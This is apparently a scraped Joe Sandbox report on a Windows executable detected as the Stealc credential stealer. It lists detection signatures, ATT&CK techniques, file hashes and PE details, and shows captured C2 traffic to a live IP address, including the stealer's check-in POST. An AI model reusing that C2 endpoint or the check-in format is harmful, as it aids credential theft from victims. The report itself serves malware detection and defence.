                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00699790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_006998E0
                Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &CProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C75A8 cpuid 0_2_006C75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00697D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00697B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006979E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00697BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0015.t-0009.t-msedge.net
                		13.107.246.43
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/6c4adf523b719729.phptrue
                    		unknown
                    http://185.215.113.206/true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.206/0file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.phpNfile.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.phpzfile.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.phpfhfile.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1546478
                                  Start date and time:2024-11-01 00:37:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 15s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 133
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/746f34465cf17784/sqlite3.dll
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  ykDoK8BtxW.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  s-part-0015.t-0009.t-msedge.net8FebOORbmE.vbsGet hashmaliciousUnknownBrowse
                                  • 13.107.246.43
                                  https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1Get hashmaliciousHTMLPhisherBrowse
                                  • 13.107.246.43
                                  https://uslpsz.efkbkot.xyz/e7e68e62c/JV9-MXEwfF9fJSVeKl/8jaSp4fjVfMW/EzJV4vXiNeJHw9OXxufDBAZSp5YzkhdDNlZG8lN0AjJGd-fD8kIXJ8Kg2Get hashmaliciousUnknownBrowse
                                  • 13.107.246.43
                                  https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM=Get hashmaliciousHTMLPhisherBrowse
                                  • 13.107.246.43
                                  https://7654658765888767.azurefd.net/mt92CGet hashmaliciousHTMLPhisherBrowse
                                  • 13.107.246.43
                                  https://massgrave.dev/getGet hashmaliciousUnknownBrowse
                                  • 13.107.246.43
                                  original.emlGet hashmaliciousHTMLPhisherBrowse
                                  • 13.107.246.43
                                  https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1Get hashmaliciousUnknownBrowse
                                  • 13.107.246.43
                                  Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 13.107.246.43
                                  ATTN1.htmlGet hashmaliciousUnknownBrowse
                                  • 13.107.246.43

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  ykDoK8BtxW.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.957120921245521
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'123'776 bytes
                                  MD5:43deae52c429449144c488c4ea074c14
                                  SHA1:2496e112cf08e1584a15d65409d84936f3c8b7f9
                                  SHA256:bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf
                                  SHA512:f892ccc0112a9910bb1f8e391304890b1d2d8f77d7ab6428de2c6a8caa554ee979dcee531acc95944942914ed503a459f29691be24ae73cb440f3480a9969db5
                                  SSDEEP:49152:vYv5z1zDZeVTz5VTmmGkADB6bn9ImIO53GFgFgANX:o59udFmmvADBwim72
                                  TLSH:E8A5337647D902BDE24EB734EE89D759623AB32F8D58802733434A204D766B5C613E2F
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xb23000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F0AD88835DAh
                                  cmovbe esp, dword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x2e70000x67600326b19e60cbdb9983a52c3d01dd0e93eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x2ea0000x29c0000x200bad0a9df75e7e545a1e0fe5d5145f590unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  fozyxqhw0x5860000x19c0000x19b60056938cc87a32374ca709f227834fb2ebFalse0.9946884020814342data7.952608283646461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  gnsdcfju0x7220000x10000x60042c6f017c58e68fd6e626fab97c0e87dFalse0.5716145833333334data5.030145868258663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x7230000x30000x2200c81fd016083f231de771a83e3646a7edFalse0.05526194852941176DOS executable (COM)0.7991046338905283IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-11-01T00:38:04.204405+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 1, 2024 00:38:02.984334946 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 00:38:02.990505934 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 00:38:02.990689993 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 00:38:02.990912914 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 00:38:02.997159958 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 00:38:03.905581951 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 00:38:03.905725002 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 00:38:03.914220095 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 00:38:03.920823097 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 00:38:04.204340935 CET8049704185.215.113.206192.168.2.5
                                  Nov 1, 2024 00:38:04.204405069 CET4970480192.168.2.5185.215.113.206
                                  Nov 1, 2024 00:38:07.867949009 CET4970480192.168.2.5185.215.113.206

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 1, 2024 00:38:13.958625078 CET1.1.1.1192.168.2.50x7995No error (0)shed.dual-low.s-part-0015.t-0009.t-msedge.nets-part-0015.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 1, 2024 00:38:13.958625078 CET1.1.1.1192.168.2.50x7995No error (0)s-part-0015.t-0009.t-msedge.net13.107.246.43A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704185.215.113.206804024C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Nov 1, 2024 00:38:02.990912914 CET90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Nov 1, 2024 00:38:03.905581951 CET203INHTTP/1.1 200 OK
                                  Date: Thu, 31 Oct 2024 23:38:03 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Nov 1, 2024 00:38:03.914220095 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a
                                  Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--
                                  Nov 1, 2024 00:38:04.204340935 CET210INHTTP/1.1 200 OK
                                  Date: Thu, 31 Oct 2024 23:38:04 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:19:37:58
                                  Start date:31/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x680000
                                  File size:2'123'776 bytes
                                  MD5 hash:43DEAE52C429449144C488C4EA074C14
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:2.9%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
